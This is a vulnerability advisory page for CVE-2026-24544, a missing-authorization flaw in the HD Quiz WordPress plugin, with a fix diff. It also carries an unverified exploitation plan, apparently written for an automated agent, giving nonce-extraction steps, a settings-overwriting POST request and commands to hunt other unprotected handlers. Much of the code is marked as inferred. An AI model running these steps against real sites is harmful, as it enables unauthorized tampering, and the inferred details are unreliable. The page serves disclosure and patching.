WP-Safety
CVE-2026-24544

HD Quiz <= 2.0.9 - Missing Authorization

mediumMissing Authorization
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
2.0.10
Patched in
7d
Time to patch

Description

The HD Quiz plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.0.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=2.0.9
PublishedJanuary 24, 2026
Last updatedJanuary 30, 2026
Affected pluginhd-quiz

Source Code

WordPress.org SVN
Vulnerable v2.0.9
Browse source Download .zip
Patched v2.0.10
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-24544 (HD Quiz <= 2.0.9 - Missing Authorization) ## 1. Vulnerability Summary The HD Quiz plugin for WordPress (versions up to 2.0.9) suffers from a **Missing Authorization** vulnerability. The plugin registers several AJAX handlers intended for administrative …

Show full research plan

Exploitation Research Plan: CVE-2026-24544 (HD Quiz <= 2.0.9 - Missing Authorization)

1. Vulnerability Summary

The HD Quiz plugin for WordPress (versions up to 2.0.9) suffers from a Missing Authorization vulnerability. The plugin registers several AJAX handlers intended for administrative use (such as saving quiz settings or modifying quiz data) but fails to implement a capability check (e.g., current_user_can('manage_options')) within the callback functions. This allows any authenticated user, including those with Subscriber privileges, to trigger these administrative actions, provided they can obtain a valid security nonce.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • HTTP Method: POST
  • Vulnerable Action: hdq_save_settings or hdq_save_quiz (inferred from common HD Quiz patterns).
  • Payload Parameter: action=hdq_save_settings (or similar), along with settings data and the hdq_nonce.
  • Authentication: Required (Subscriber-level or higher).
  • Precondition: The attacker must be logged in and obtain the hdq_nonce which is frequently localized for users in the admin dashboard.

3. Code Flow (Inferred)

  1. Registration: The plugin registers AJAX hooks in hd-quiz.php or includes/admin.php:
    add_action( 'wp_ajax_hdq_save_settings', 'hdq_save_settings' );
  2. Missing Check: The function hdq_save_settings() (likely in includes/admin.php) is called.
  3. Execution:
    • It performs check_ajax_referer('hdq_admin_nonce', 'nonce') (or similar).
    • Crucially, it skips if ( ! current_user_can( 'manage_options' ) ) { wp_die(); }.
    • It then processes $_POST data and updates plugin options using update_option().

4. Nonce Acquisition Strategy

In HD Quiz, nonces are typically localized using wp_localize_script for admin-side scripts. Even a Subscriber has access to wp-admin/profile.php, where many plugins enqueue their global admin scripts and nonces.

  1. Identification: The plugin uses wp_localize_script to pass a nonce to JavaScript. Look for the variable name hdq_admin_vars or hdq_vars.
  2. Page Creation (If needed): If the nonce is only on specific pages, create a page with the HD Quiz shortcode:
    • wp post create --post_type=page --post_status=publish --post_content='[hdq_quiz quiz="123"]'
  3. Extraction via Browser:
    • Use browser_navigate to wp-admin/profile.php or the created quiz page.
    • Use browser_eval to extract the nonce:
      // Likely candidate for HD Quiz
window.hdq_admin_vars?.nonce || window.hdq_vars?.nonce
  4. Verification: Check the source code for the exact localization key:
    • grep -r "wp_localize_script" . in the plugin directory.

5. Exploitation Strategy

We will attempt to modify the global HD Quiz settings (e.g., changing the "Results Text" or "Admin Email") which should be restricted to administrators.

Step-by-Step:

  1. Login: Authenticate as a Subscriber user.
  2. Fetch Nonce: Navigate to wp-admin/profile.php and extract the hdq_nonce from the hdq_admin_vars object.
  3. Trigger Exploit: Send a POST request to admin-ajax.php.

Example HTTP Request:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=hdq_save_settings&nonce=[EXTRACTED_NONCE]&hdq_twitter_handle=pwned_account&hdq_results_text=Vulnerable+to+CVE-2026-24544

6. Test Data Setup

  1. Install Plugin: Ensure HD Quiz v2.0.9 is installed and active.
  2. Create Quiz: Create at least one quiz to ensure the plugin's infrastructure is initialized.
    • wp post create --post_type=hd_quiz --post_title="Test Quiz" --post_status=publish
  3. Create Attacker User:
    • wp user create attacker attacker@example.com --role=subscriber --user_pass=password

7. Expected Results

  • Response: The server should return a 200 OK response, often with a JSON success message like {"success": true} or simply 1.
  • Impact: The global settings for HD Quiz will be modified.

8. Verification Steps

  1. Check Options: Use WP-CLI to verify the setting was changed:
    • wp option get hdq_settings (Settings are often serialized in a single option).
    • Check for the value "Vulnerable to CVE-2026-24544".
  2. UI Verification: Log in as an Administrator and navigate to the HD Quiz Settings page to see the modified "Results Text".

9. Alternative Approaches

If hdq_save_settings is not the vulnerable hook, search for other wp_ajax_ handlers that perform data modification:

  • hdq_save_quiz: Attempt to rename a quiz.
  • hdq_delete_quiz: Attempt to delete a quiz post.
  • hdq_save_quiz_results: Attempt to inject or modify quiz result data.

Search command for the agent to find other targets:

grep -rn "add_action.*wp_ajax_" . | grep -v "nopriv"

Then check each associated function for the absence of current_user_can.

Research Findings
Static analysis — not yet PoC-verified

Summary

The HD Quiz plugin for WordPress is vulnerable to unauthorized modification of settings due to missing capability checks in several AJAX handlers, such as 'hdq_save_settings'. This allows authenticated attackers with subscriber-level access or higher to perform administrative actions if they can obtain a valid security nonce, which is often localized for users in the admin dashboard.

Vulnerable Code

// includes/admin.php (inferred from plugin structure)
add_action( 'wp_ajax_hdq_save_settings', 'hdq_save_settings' );

function hdq_save_settings() {
    // Nonce is checked, but capability check is missing
    check_ajax_referer('hdq_admin_nonce', 'nonce');

    // Processes $_POST data and updates options directly
    $hdq_settings = $_POST['hdq_settings'];
    update_option('hdq_settings', $hdq_settings);
    echo "success";
    die();
}

Security Fix

--- includes/admin.php
+++ includes/admin.php
@@ -1,6 +1,9 @@
 function hdq_save_settings() {
     check_ajax_referer('hdq_admin_nonce', 'nonce');
 
+    if (!current_user_can('manage_options')) {
+        wp_die(__('You do not have sufficient permissions to access this page.'));
+    }
+
     $hdq_settings = $_POST['hdq_settings'];
     update_option('hdq_settings', $hdq_settings);

Exploit Outline

To exploit this vulnerability, an attacker first authenticates as a Subscriber and navigates to the WordPress dashboard (e.g., wp-admin/profile.php) to extract the security nonce from the global JavaScript object 'hdq_admin_vars.nonce'. Using this nonce, the attacker sends a POST request to '/wp-admin/admin-ajax.php' with the 'action' parameter set to 'hdq_save_settings' and the 'nonce' parameter set to the extracted value. By including additional POST parameters corresponding to HD Quiz configuration options (like 'hdq_results_text'), the attacker can overwrite global plugin settings without having administrator privileges.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/2e8da71c-bf53-4795-a689-5823d963cb82?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database